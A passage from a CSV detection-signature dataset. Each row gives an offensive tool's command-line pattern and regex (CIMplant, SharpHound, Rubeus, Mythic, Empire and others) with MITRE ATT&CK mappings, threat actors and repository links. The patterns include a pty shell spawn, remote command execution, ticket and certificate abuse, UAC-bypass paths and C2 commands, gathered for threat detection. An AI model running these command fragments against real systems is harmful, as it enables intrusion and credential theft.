Evasion","https://github.com/GreatSCT/GreatSCT","1","0","N/A","N/A","10","1112","199","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z" "* -c '/accepteula /s calc.exe' -e PsExec64.exe*",".{0,1000}\s\-c\s\'\/accepteula\s\/s\scalc\.exe\'\s\-e\sPsExec64\.exe.{0,1000}","offensive_tool_keyword","pywsus","The main goal of this tool is to be a standalone implementation of a legitimate WSUS server which sends malicious responses to clients. The MITM attack itself should be done using other dedicated tools such as Bettercap.","T1505.003 - T1001.001 - T1560.001 - T1071.001","TA0003 - TA0011 - TA0002","N/A","N/A","Network Exploitation tools","https://github.com/GoSecure/pywsus","1","0","N/A","N/A","3","272","44","2022-11-11T19:59:21Z","2020-08-11T21:44:35Z" "* -c active_users -u *",".{0,1000}\s\-c\sactive_users\s\-u\s.{0,1000}","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","0","N/A","10","2","194","29","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" "* -c all -d * --domaincontroller *",".{0,1000}\s\-c\sall\s\-d\s.{0,1000}\s\-\-domaincontroller\s.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","7","609","135","2024-04-30T13:43:35Z","2021-07-12T17:07:04Z" "* -c command_exec --execute tasklist*",".{0,1000}\s\-c\scommand_exec\s\-\-execute\stasklist.{0,1000}","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","0","N/A","10","2","194","29","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" "* -c command_exec --execute whoami*",".{0,1000}\s\-c\scommand_exec\s\-\-execute\swhoami.{0,1000}","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","0","N/A","10","2","194","29","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" "* -c CredEnum.c*",".{0,1000}\s\-c\sCredEnum\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","0","N/A","10","10","158","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" "* -c DCOnly -d * -u * -p * -o /tmp*",".{0,1000}\s\-c\sDCOnly\s\-d\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}\s\-o\s\/tmp.{0,1000}","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","Discovery","https://github.com/OPENCYBER-FR/RustHound","1","0","AD Enumeration","9","9","867","84","2024-03-14T08:53:31Z","2022-10-12T05:54:35Z" "* -c edr_query *",".{0,1000}\s\-c\sedr_query\s.{0,1000}","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","0","N/A","10","2","194","29","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" "* -c 'import pty;pty.spawn(""/bin/sh*",".{0,1000}\s\-c\s\'import\spty\;pty\.spawn\(\""\/bin\/sh.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","risk of False positive","4","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "* -c logon_events * -u *",".{0,1000}\s\-c\slogon_events\s.{0,1000}\s\-u\s.{0,1000}","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","0","N/A","10","2","194","29","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" "* -c ls --directory * -u * -p *",".{0,1000}\s\-c\sls\s\-\-directory\s.{0,1000}\s\-u\s.{0,1000}\s\-p\s.{0,1000}","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","0","N/A","10","2","194","29","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" "* -c process_kill --process *",".{0,1000}\s\-c\sprocess_kill\s\-\-process\s.{0,1000}","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","0","N/A","10","2","194","29","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" "* -c service_mod --execute create -s *",".{0,1000}\s\-c\sservice_mod\s\-\-execute\screate\s\-s\s.{0,1000}","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","0","N/A","10","2","194","29","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" "* -c upload --fileto * --file *",".{0,1000}\s\-c\supload\s\-\-fileto\s.{0,1000}\s\-\-file\s.{0,1000}","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","0","N/A","10","2","194","29","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" "* -c vacant_system * -u *",".{0,1000}\s\-c\svacant_system\s.{0,1000}\s\-u\s.{0,1000}","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","0","N/A","10","2","194","29","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" "* -c -w methods.txt -p 127.0.0.1*",".{0,1000}\s\-c\s\-w\smethods\.txt\s\-p\s127\.0\.0\.1.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "* -c -z range*1-10 --hc=BBB http*",".{0,1000}\s\-c\s\-z\srange.{0,1000}1\-10\s\-\-hc\=BBB\shttp.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "* c:\\Temp\\lua.log*",".{0,1000}\sc\:\\\\Temp\\\\lua\.log.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059 - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/hackerhouse-opensource/OffensiveLua","1","0","N/A","8","2","164","26","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z" "* C:\ProgramData\sh.txt*",".{0,1000}\sC\:\\ProgramData\\sh\.txt.{0,1000}","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* C:\temp\w.log*",".{0,1000}\sC\:\\temp\\w\.log.{0,1000}","offensive_tool_keyword","SharpEfsPotato","Local privilege escalation from SeImpersonatePrivilege using EfsRpc.","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bugch3ck/SharpEfsPotato","1","0","N/A","10","3","276","43","2022-10-17T12:35:06Z","2022-10-17T12:20:47Z" "* C:\Users\Public\build.bat*",".{0,1000}\sC\:\\Users\\Public\\build\.bat.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "* C:\Users\Public\build.vbs*",".{0,1000}\sC\:\\Users\\Public\\build\.vbs.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "* C:\Users\Public\DtcInstall.txt*",".{0,1000}\sC\:\\Users\\Public\\DtcInstall\.txt.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "* c2 add *",".{0,1000}\sc2\sadd\s.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","0","N/A","10","10","2895","405","2024-04-23T14:28:51Z","2018-07-05T02:09:59Z" "* c2 start http *",".{0,1000}\sc2\sstart\shttp\s.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","0","N/A","10","10","2895","405","2024-04-23T14:28:51Z","2018-07-05T02:09:59Z" "* c2_server.py*",".{0,1000}\sc2_server\.py.{0,1000}","offensive_tool_keyword","Commander","A command and control (C2) server","T1021 - T1027 - T1059","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/voukatas/Commander","1","0","N/A","10","10","43","12","2023-03-24T08:37:17Z","2023-02-03T16:46:33Z" "* c2profile.Name*",".{0,1000}\sc2profile\.Name.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "* -c2server *",".{0,1000}\s\-c2server\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "* --CaCertPath *.pfx --CaCertPassword *",".{0,1000}\s\-\-CaCertPath\s.{0,1000}\.pfx\s\-\-CaCertPassword\s.{0,1000}","offensive_tool_keyword","ForgeCert","ForgeCert uses the BouncyCastle C# API and a stolen Certificate Authority (CA) certificate + private key to forge certificates for arbitrary users capable of authentication to Active Directory.","T1553.002 - T1136.003 - T1059.001","TA0006 - TA0002","N/A","N/A","Defense Evasion","https://github.com/GhostPack/ForgeCert","1","0","N/A","10","6","589","96","2022-10-07T18:18:09Z","2021-06-09T22:04:18Z" "* CallDirect.py*",".{0,1000}\sCallDirect\.py.{0,1000}","offensive_tool_keyword","POC","Vulnerability checker for Callstranger (CVE-2020-12695). An attacker can use this vulnerability for Bypassing DLP for exfiltrating data. Using millions of Internet-facing UPnP device as source of amplified reflected TCP DDoS / SYN Flood? Scanning internal ports from Internet facing UPnP devices This script only simulates data exfiltration","T1046 - T1595 - T1587","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation tools","https://github.com/yunuscadirci/CallStranger","1","0","N/A","N/A","5","402","67","2021-08-07T16:48:55Z","2020-06-08T07:37:49Z" "* CallStranger.py*",".{0,1000}\sCallStranger\.py.{0,1000}","offensive_tool_keyword","POC","Vulnerability checker for Callstranger (CVE-2020-12695). An attacker can use this vulnerability for Bypassing DLP for exfiltrating data. Using millions of Internet-facing UPnP device as source of amplified reflected TCP DDoS / SYN Flood? Scanning internal ports from Internet facing UPnP devices This script only simulates data exfiltration","T1046 - T1595 - T1587","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation tools","https://github.com/yunuscadirci/CallStranger","1","0","N/A","N/A","5","402","67","2021-08-07T16:48:55Z","2020-06-08T07:37:49Z" "* camhacker *",".{0,1000}\scamhacker\s.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "* camhacker:/CamHacker*",".{0,1000}\scamhacker\:\/CamHacker.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","10","N/A","N/A","N/A","N/A","N/A" "* can now impersonate users on * via S4U2Proxy*",".{0,1000}\scan\snow\simpersonate\susers\son\s.{0,1000}\svia\sS4U2Proxy.{0,1000}","offensive_tool_keyword","SharpADWS","SharpADWS Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS)","T1087 - T1069 - T1018 - T1083 - T1595","TA0001 - TA0002 - TA0007","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpADWS","1","0","N/A","7","4","326","30","2024-03-19T08:57:52Z","2024-02-13T17:28:00Z" "* Can search all Teams messages in all channels that are readable by the current user*",".{0,1000}\sCan\ssearch\sall\sTeams\smessages\sin\sall\schannels\sthat\sare\sreadable\sby\sthe\scurrent\suser.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1114.002 - T1078 - T1213","TA0009 - TA0003 - TA0005","N/A","N/A","POST Exploitation tools","https://github.com/dafthack/GraphRunner","1","0","#contentstrings","10","8","722","80","2024-03-14T17:05:34Z","2023-08-15T17:19:11Z" "* -caplet *.cap",".{0,1000}\s\-caplet\s.{0,1000}\.cap","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","0","N/A","N/A","10","15702","1412","2024-04-08T07:48:24Z","2018-01-07T15:30:41Z" "* cassandra-brute.nse*",".{0,1000}\scassandra\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* cassandra-info.nse*",".{0,1000}\scassandra\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* catspin.sh *",".{0,1000}\scatspin\.sh\s.{0,1000}","offensive_tool_keyword","catspin","Catspin rotates the IP address of HTTP requests making IP based blocks or slowdown measures ineffective. It is based on AWS API Gateway and deployed via AWS Cloudformation.","T1027 - T1071 - T1047 - T1090","TA0042 - TA0001 - TA0005","N/A","N/A","Defense Evasion","https://github.com/rootcathacking/catspin","1","0","N/A","9","3","252","32","2024-03-01T09:25:02Z","2022-07-26T08:08:33Z" "* CC_TRIGGER_SYN_PACKET_KEY_3_ENCRYPTED_SHELL*",".{0,1000}\sCC_TRIGGER_SYN_PACKET_KEY_3_ENCRYPTED_SHELL.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking - persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","N/A","10","10","1709","211","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z" "* --ccache-ticket *",".{0,1000}\s\-\-ccache\-ticket\s.{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/smartbrute","1","0","N/A","10","4","312","54","2024-03-04T19:23:03Z","2021-07-16T14:53:29Z" "* cccam-version.nse*",".{0,1000}\scccam\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* ccmpwn.py*",".{0,1000}\sccmpwn\.py.{0,1000}","offensive_tool_keyword","ccmpwn","Lateral Movement script that leverages the CcmExec service to remotely hijack user sessions","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/mandiant/ccmpwn","1","0","N/A","10","2","122","11","2024-03-26T20:51:27Z","2024-03-14T18:43:24Z" "* --certdump *",".{0,1000}\s\-\-certdump\s.{0,1000}","offensive_tool_keyword","SOAPHound","enumerate Active Directory environments via the Active Directory Web Services (ADWS)","T1018 - T1087.002","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/FalconForceTeam/SOAPHound","1","0","N/A","8","6","558","57","2024-02-03T08:52:49Z","2024-01-25T09:11:12Z" "* certipy-ad*",".{0,1000}\scertipy\-ad.{0,1000}","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","2135","293","2024-04-24T10:28:14Z","2021-10-06T23:02:40Z" "* changepw * /ticket:*",".{0,1000}\schangepw\s.{0,1000}\s\/ticket\:.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* chaos.exe *",".{0,1000}\schaos\.exe\s.{0,1000}","offensive_tool_keyword","chaos","CHAOS is a free and open-source Remote Administration Tool that allow generate binaries to control remote operating systems","T1105 - T1059 - T1021 - T1041 - T1569.002 - T1573","TA0002 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/tiagorlampert/CHAOS","1","0","N/A","10","10","2226","483","2023-11-02T02:47:40Z","2017-07-11T06:54:56Z" "* charlotte.cpp*",".{0,1000}\scharlotte\.cpp.{0,1000}","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/9emin1/charlotte","1","0","N/A","10","10","952","212","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z" "* charlotte.dll *",".{0,1000}\scharlotte\.dll\s.{0,1000}","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/9emin1/charlotte","1","0","N/A","10","10","952","212","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z" "* CharSubroutine-Macro.xls*",".{0,1000}\sCharSubroutine\-Macro\.xls.{0,1000}","offensive_tool_keyword","Macrome","An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/","T1140","TA0005","N/A","N/A","Exploitation tools","https://github.com/michaelweber/Macrome","1","0","N/A","N/A","6","519","77","2022-02-01T16:26:13Z","2020-05-07T22:44:11Z" "* -CheckShareAccess -Verbose*",".{0,1000}\s\-CheckShareAccess\s\-Verbose.{0,1000}","offensive_tool_keyword","powersploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "* --check-tor *",".{0,1000}\s\-\-check\-tor\s.{0,1000}","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","0","N/A","N/A","10","30613","5540","2024-04-30T09:43:28Z","2012-06-26T09:52:15Z" "* -ChildPath *fodhelper.exe*",".{0,1000}\s\-ChildPath\s.{0,1000}fodhelper\.exe.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-FodHelperBypass.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* -ChildPath *sdclt.exe*",".{0,1000}\s\-ChildPath\s.{0,1000}sdclt\.exe.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - 